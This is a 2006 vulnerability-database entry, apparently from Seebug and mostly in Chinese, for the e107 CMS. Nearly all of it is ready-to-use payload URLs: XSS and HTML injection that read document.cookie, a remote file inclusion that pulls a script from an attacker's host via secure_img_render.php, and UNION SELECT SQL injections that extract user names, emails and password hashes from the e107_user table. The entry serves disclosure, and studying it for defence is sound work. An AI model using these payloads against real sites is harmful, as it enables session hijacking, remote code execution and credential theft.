e107WebsiteSystem多个安全漏洞 Exploit

2006-12-09T00:00:00
ID SSV:5790
Type seebug
Reporter Root
Modified 2006-12-09T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Janek Vind (come2waraxe@yahoo.com)提供了如下测试方法:

- 跨站脚本执行: 

http://www.example.com/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); 
//--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E 

http://www.example.com/e107_0615/usersettings.php?avmsg=[xss code here] 

- 在"email article to a friend" 和"submit news"页中进行HTML注入: 

foobar'><body onload=alert(document.cookie);> 

- 文件包含: 

http://www.example.com/e107_0615/e107_handlers/secure_img_render.php?p=http://<attacker's host>/<attacker's script>.php 

- SQL注入: 

http://www.example.com/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null, 
null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/* 

http://www.example.com/e107_0615/content.php?query=content_id=99%20UNION%20select%20null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, 
null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/* 

http://www.example.com/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null, 
CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null, 
null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*